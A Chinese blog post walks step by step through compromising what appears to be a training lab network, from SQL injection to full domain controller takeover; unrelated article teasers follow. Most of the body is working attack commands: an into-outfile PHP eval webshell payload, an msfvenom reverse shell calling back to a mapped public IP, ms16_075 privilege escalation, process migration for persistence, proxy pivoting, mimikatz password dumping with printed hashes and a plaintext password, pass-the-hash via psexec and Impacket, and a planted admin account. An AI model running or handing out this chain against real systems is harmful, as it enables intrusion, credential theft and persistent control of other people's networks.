msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 密洛陀(密洛陀到底是什么东西)

    巴乃吊脚楼里神秘的“铁块”竟然不怕硫酸腐蚀,密洛陀真是黑毛蛇控制的傀儡吗?相信你就上当了。   由曾舜晞,肖宇梁,成方旭,哈尼克孜,刘宇宁主演,王劲松,范明特别出演的探险题材电视剧《终极笔记》已经完美收官,豆瓣评分8.0分,口碑炸裂,令人欣喜。   而剧中对于小哥在巴乃吊脚楼自己曾经的居所找到的神秘“铁块”却并没有做出交代,那么这种对于钢…

    2021-12-26 投稿
  • 75寸电视观看距离对照表,85寸电视离地面最佳尺寸

    虽然近些年各种手机越来越智能化,各种智能的电子产品层出不穷,但依然无法撼动电视机在家庭中地位。尤其是大屏幕的电视机已经成为了趋势,当前主流的55英寸、65英寸电视机已经不能满足很多家庭的需求,75英寸甚至更大屏幕的电视机受到越来越多家庭的关注。如果家里的客厅距离比较小,只有3米多,适合多大屏幕的电视机呢? 其实多大的空间适合选择多大屏幕的电视机已经是个老生常…

    2023-06-18 投稿
  • 淘宝自然流量获取(淘宝的自然流量是怎么获取的)

    自然流量,就像自来水。   家里有水龙头,交了水费,也就有水了。   回到场景。   我们说的淘宝自然流量,也就是搜索流量。   搜索流量的产生逻辑是:   “买家在淘宝搜索某个关键词,看到了你的产品,并且被你的主图吸引而产生了点击”。   点击之后带来的流量与访客,就是淘宝的自然搜索流量。 &nb…

    2022-01-23
  • 被约谈人表态意见如何写(整改约谈记录内容怎么写)

    甲方集团总部对我司施工的住宅用房项目进行的第三方检查,分别对实测实量、安全文明、管理行为进行了检查,尤其是实测实量,结果很不理想。没有偶然,只有必然,面对这样的成绩,我们必须要深刻反省,深层剖析,找出原因,吸取教训。为了以后更好的完成后续工程,我部必须在思想、工作、管理等方面力求改进和转变,现将整改措施报告如下: 一、存在问题 首先我部存在的最大的问题是前期…

    投稿 2021-12-12
  • 计算机编程语言有哪些(网络编程语言或技术)

    计算机编程语言有:C语言(绘图能力强,具有可移植性)、java(通用性、高效性)、c (支持多重编程范式)、php(超文本预处理语言)、c#语言等。 微服务项目中常用的7种语言:JavaC#GoTypescriptPythonHaskellBallerina网络安全编程的前 10 种语言:C/C PythonJavaJavaScriptPHPSQLGoRub…

    投稿 2023-01-31
  • 关于淘宝规则的变更(淘宝规则变更时会以电话方式通知)

    淘宝新规则在哪里进行查看?淘宝新规则有哪些?在淘宝平台进行店铺的开始都是需要对淘宝规则进行了解,这样才能在运营过程中不要触及到淘规则以外的东西,以免出现违规扣分的情况,同时一些大促活动的要求和规则也会根据需求进行变更,这样参加活动的商家来说都显得尤为重要。 1. 可以通过【千牛卖家中心】-【卖家培训中心】-【知识学习】,然后在搜索栏或者左侧菜单栏中找到淘宝规…

    投稿 2021-11-08
  • 线上线下互动营销案例(线下推广活动案例)

    当下如何创办出一场刷屏级线下活动? 今天就给大家带来一份非常具有实操性的攻略!   01 时效性   时效性就是抓住当下的热点,通常一些热点是具有预见性的,比如节日。 而有些活动是不可预见的,就需要大家发挥自己敏锐的嗅觉。 像倡导全民运动这个节点,有些商家就借助运动这一热点,结合自身的品牌做了一场线下的彩虹跑活动,效果非常好。 &nbsp…

    2022-05-26 投稿
  • 微信有3000人怎么群发,微信群发3000人一次能发完吗

    现如今,微信早已成为了生活的一部分,微信好友的营销成了商家的必争之地,动辄2000+的微信好友维护起来,确实费劲! 小编为你准备了一份基于Excel 实现的微信群发的脚本,上手即用!因为是模拟人工操作的脚本,所以只要不要发送太频繁就没有被封号的担忧啦! 往下动图,走起…… 01 导入通信录   02 选择需要群发的好友 在这里只要输入姓名/备注名,…

    2022-03-16
  • 交通违章积分什么时候清零(交通违章分数何时清零)

    转眼间2021年已经是最后一个月了,各商家年底积分清零的消息纷纷发出来,“积分兑换好礼” “积分当钱花”各种营销又是一轮。消费营销我们可以不去理睬,可驾驶证的积分迟迟没有清零的消息,却让很多车主焦虑了,啥时候能满血复活呢?其实与其他消费积分不同,驾照的记分周期,记分清零有特定规则。   驾驶证记分周期是怎么计算的? 驾驶证的记分周期为一年,可能很多…

    2021-12-26 投稿
  • 交个朋友直播间主播介绍 交个朋友直播间

    红星资本局6月2日消息,罗永浩抖音账号今日正式更名为“交个朋友直播间”,账号头像也从罗永浩单人照更改为团队合照。 “交个朋友直播间”公告称,“罗永浩”账号开播两年多,罗永浩的直播时长已不到公司总直播时长的3%。为了公司更加正规化的发展,6月2日起,“罗永浩”账号升级为“交个朋友直播间”,继续由北京交个朋友数码科技有限公司运营。公告同时表示,罗永浩未来仍在主播…

    2023-04-03
  • 澳门的市花是什么(澳门市市花是什么)

    紫荆花作为香港特别行政区的区花,想必大家肯定不会陌生。但是,对于紫荆花你了解多少?首次发现是在哪里?带着疑问,中环报记者采访了中国科学院华南植物园博士湛青青。 紫荆花是什么花? 对于南方的小伙伴们来说,其实紫荆花并不陌生,粉色、白色、桃红色、紫红·····不同颜色的紫荆花开满了街头巷尾。在南方紫荆花并不单指一种花,而是羊蹄甲属(Bauhinia Linn.)…

    2023-05-25
  • 吴莫愁的爸爸(吴莫愁的父是干什么的)

    10月2日,一条#李克勤吴莫愁看余空淘汰哭了#的词条突然出现在热搜榜上,突然吸引了网友注意。   2012年,吴莫愁参加《中国好声音》以一首高难度的《PriceTag》,获得庾澄庆青睐。 因其扎实的唱功,充满爆发力的摇滚范,获得全国亚军,一举成名 刚出道的她,代言费高达1.3亿,秒杀好声音一众导师。 身上的资源,让很多娱乐圈的“老人”都眼红不已。 …

    2022-01-20 投稿